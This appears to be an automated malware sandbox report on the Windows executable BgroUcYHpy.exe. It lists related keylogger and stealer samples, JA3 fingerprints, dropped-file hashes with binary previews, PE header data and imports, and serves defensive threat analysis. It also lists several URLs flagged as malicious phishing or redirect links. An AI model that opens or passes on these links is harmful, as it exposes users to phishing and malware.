	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	proforma invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	random.exe	Get hash	malicious	CStealer	Browse	149.154.167.220
	random.exe	Get hash	malicious	CStealer	Browse	149.154.167.220
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc	Browse	149.154.167.220
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://tintin.klipdesak.shop/rinko.png	Get hash	malicious	Unknown	Browse	104.21.112.1
	https://my.remarkable.com/	Get hash	malicious	Unknown	Browse	104.19.153.19
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	https://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=	Get hash	malicious	Unknown	Browse	104.18.95.41
	https://u18282959.ct.sendgrid.net/ls/click?upn=u001.rEMfFlpAoJgeimh0eSdetqZJOaDEFgZEM86yJv-2FFqn4BDVcYSBJ7qe3MiIpMf7EHr39f_olH575WPuDKQ6-2BlwfkTb3bEPQyZlspfhjzLUkESeUKdz-2BSLVmhS-2BiNhtE4sjBDlEtszfbsE5c6igxavK3muY3tYeP6QkmX-2BJi-2BaLU6j8Wsp6hQUS9QOYhOuxeiGpmu9xPXTXniG-2FhK47xPzbY2a7dAVr4WH1EaPd9qfgngR-2BS0-2BE0l9vGYKsxljCm-2F3LXvjLQIge-2FSmK3YEyKDG8HCxUjDZIuKEbjKZRrfVUUqiw37aYZrphVQ5WvB0QOlR-2Be2shKtaVihd3RfTtBEd0NyHk9A-3D-3D	Get hash	malicious	Unknown	Browse	104.18.86.42
	XL-1-6-25-(EXCEL LATEST 2025).html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	http://vwi46h7.terraclicks.click/rd/4fRUWo26099tRCA461sdwbdplppv232VXGPAFVAHBPJXIV321477KIEL571756p9	Get hash	malicious	Phisher	Browse	188.114.96.3
ORACLE-BMC-31898US	VSLS SCHEDULE_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	ungziped_file.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	miori.x86.elf	Get hash	malicious	Unknown	Browse	140.204.251.205
	New order 2025.msg	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.130.0
	FORTUNE RICH_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Fantazy.i686.elf	Get hash	malicious	Unknown	Browse	193.123.7.176
	fuckunix.spc.elf	Get hash	malicious	Mirai	Browse	144.25.181.0
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	158.101.44.242

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	VSLS SCHEDULE_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	ungziped_file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	fatura098002.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	New order 2025.msg	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	https://my.remarkable.com/	Get hash	malicious	Unknown	Browse	149.154.167.220
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	z.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	149.154.167.220
	h.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	149.154.167.220
	web55.mp4.hta	Get hash	malicious	LummaC	Browse	149.154.167.220
	atomxml.ps1	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	149.154.167.220
	QUOTATION - RFQ2496_PO 08775622879.pdf(87kb).com.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	proforma invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\BgroUcYHpy.exe
File Type:	data
Category:	dropped
Size (bytes):	201712
Entropy (8bit):	7.987552340545012
Encrypted:	false
SSDEEP:	6144:J2Mvmo2CHAACylkOwVI3LIxGFjFcPi0Aa1po:JbeoRRlkOdIxGFjFcPi0Aao
MD5:	EA752C7C59A3AAF8CFB70EDAF5279AAD
SHA1:	2155C725495BA2F2C1D2164C005DBA103D22DEC1
SHA-256:	E5A3E33B21418D0A139F6F83DF17AA04FBAE17561080B1DDAEA49BCED9C640A3
SHA-512:	A89F607C4E9DD0C27246FB57C6A9D5A434A07D4EA2E6447C8E3F8412C36825DB441A16ECBF74F59C8EBED9B03B8A5C90AFD18A22847ED7348861D69DCD2D6D21
Malicious:	false
Reputation:	low
Preview:	EA06..,..@.S....9.Q.5]...E.Lf.zd.Y.Lh@..`.X.Pk.Z0..h@.....X.K~5z.....`k0.%.-)......W@.M,U)..OV.Y.s...[+.V+.xE.1y...{<.M..,f.G.G..E>.3...m...b...4.....I.4.D..H..b.MD..f.S.m52.z........2....).R.S..(z.8...F..z]......g1J56.6.V"....Ll4:..G..ht..V..-Y2..EH..........!..&.....c4...I..]v.1..is.....Pi....V.4)..f+ &...(.....'..\|T...W.F..<..\.[..,.iZ..@....x.0./..!..e....M.R. ..j.9.P..>..."...i..A.J...8.a7.,;.....2..m.Y..P.,bl....1.P@........Lf.{..q+..X3...5.Pk.....N... T....#......y0[...?.T9.\...J);....B.Ps..=..B.`.U.w.....r...g...bw2I...2.fg..>.m9.R.5Z/....s.........y0.l...{.@..Cyy...57.....p2.wF.R(...2{....}.......MW.8..is.~.gr.{.s:o..:.X..Z..CB.O&...6....x:.E3....h@.F+....?..;c>.Vg=.]..M.f.<...5e.v,.......1..5..v....:.f....U......Zi..#..P.z.....c.TL.[#..n......x.d.\....q..&../..Z..20..b.;.Cx8n......$...sy.....I..Iy..<.-...Xj...\...k&.}W&.\|.Rd.M.r.f.l....~.M..$..Lv.I..=...a0..n..m7{ ...x.R....0.)......u..T6#.....+..........C...{...{...n.<.z!........9

C:\Users\user\AppData\Local\Temp\nondefinition

Download File

Process:	C:\Users\user\Desktop\BgroUcYHpy.exe
File Type:	data
Category:	dropped
Size (bytes):	207872
Entropy (8bit):	7.827716150927184
Encrypted:	false
SSDEEP:	3072:7eab4ssXtT7jvQq2PvlvCfaHUwCPGOryA08lvDQkn+u25P/YgujzF:SJdv2lyQd+GtR85Qkn05PQgmzF
MD5:	37D865BAD98FCC4EB472B4A2C24FFFB2
SHA1:	67A73473011E4712FCA0232624893AAFFFDF93E0
SHA-256:	C401B5E574A1FA101454379AE627BE2736E1DDAE7312C97624463ACCE23D2030
SHA-512:	9C370778F421D3852A60BA33D3C0BC94B52B1A6065769067918E3C462B3C3377A61E30EC502795EB5E32D038482B36D1E7043E1B714C73ACC323B5ECC26D9C1D
Malicious:	false
Reputation:	low
Preview:	...1ABI9\GIU..XE.10WL2KY.1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXE.10WB-.WB.K.h.Y..t.)16fAB8+@*4bR#,'V,g+0b3-+fX^w.}.y/^&'g4UMmUBAXEF1XG..g(.On3.Gt6.+pb';y@.)G..'i@.<eH.9.$.?jf(O,&.Lyz+O.3.Gjd2+o0.;.XS?`C.'B1BBI9XGIUBAXEF1...TKYB1..I9.FMU6.X.F10WL2KY.1aCB8QGI.CAX.G10WL2d.B1BRI9X.HUBA.EF!0WL0KYG1BBI9XGLUBAXEF10'O2K]B1.yK9ZGI.BAHEF!0WL2[YB!BBI9XGYUBAXEF10WL2.L@1.BI9X'KU.JYEF10WL2KYB1BBI9XGIUBAXEF1..M2WYB1BBI9XGIUBAXEF10WL2KYB1BB.4ZG.UBAXEF10WL2K.C1.CI9XGIUBAXEF10WL2KYB1BBI9XGg!'9,EF1(.M2KIB1B.H9XCIUBAXEF10WL2KYb1B"gK<&=4BA.(F10.M2K7B1B.H9XGIUBAXEF10W.2K.lU#6(9XG.eBAXeD10AL2KS@1BBI9XGIUBAXE.10.b@8+!1BB.2YGI5@AXIG10wN2KYB1BBI9XGIU.AX.F10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XGIUBAXEF10WL2KYB1BBI9XG

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	0.18258314117760216
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BgroUcYHpy.exe
File size:	80'740'352 bytes
MD5:	0ee994344a97494cb401ab3d5c8adfc4
SHA1:	e531370efcfd8bd9494d9b19fda321366fcf7a86
SHA256:	d1d603468cbebf5aa215f2a2dce10d9326ab2c913fd5dd6e9ba003884581a335
SHA512:	bdf53c2e751a7edba03feabebdb29d15eaaa324fdc585e4f1b7ba1849e5e8749e300e276bd2ec9ebb58aa765202e5e20e0c42a9625e94140ef3caa8a60776ffb
SSDEEP:	24576:Tu6J33O0c+JY5UZ+XC0kGso6Favs2zIJdZ4gzeWY:9u0c++OCvkGs9Favs2zIfZHY
TLSH:	DC08BE2273DDC370CB669173BF69B7016EBF38214630B95B2F980D7DA950162262D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x675C2AE3 [Fri Dec 13 12:38:59 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F4718E25A5Ah
jmp 00007F4718E18824h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F4718E189AAh
cmp edi, eax
jc 00007F4718E18D0Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F4718E189A9h
rep movsb
jmp 00007F4718E18CBCh
cmp ecx, 00000080h
jc 00007F4718E18B74h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F4718E189B0h
bt dword ptr [004BE324h], 01h
jc 00007F4718E18E80h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F4718E18B4Dh
test edi, 00000003h
jne 00007F4718E18B5Eh
test esi, 00000003h
jne 00007F4718E18B3Dh
bt edi, 02h
jnc 00007F4718E189AFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F4718E189B3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F4718E18A05h
bt esi, 03h
jnc 00007F4718E18A58h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x47dc8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10f000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x47dc8	0x47e00	26d7235aa151b77e8af249d1d0bbc167	False	0.9089402173913044	data	7.849538957874588	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10f000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x3f08f	data			1.0003330867458586
RT_GROUP_ICON	0x10e848	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x10e8c0	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x10e8d4	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x10e8e8	0x14	data	English	Great Britain	1.25
RT_VERSION	0x10e8fc	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x10e9d8	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
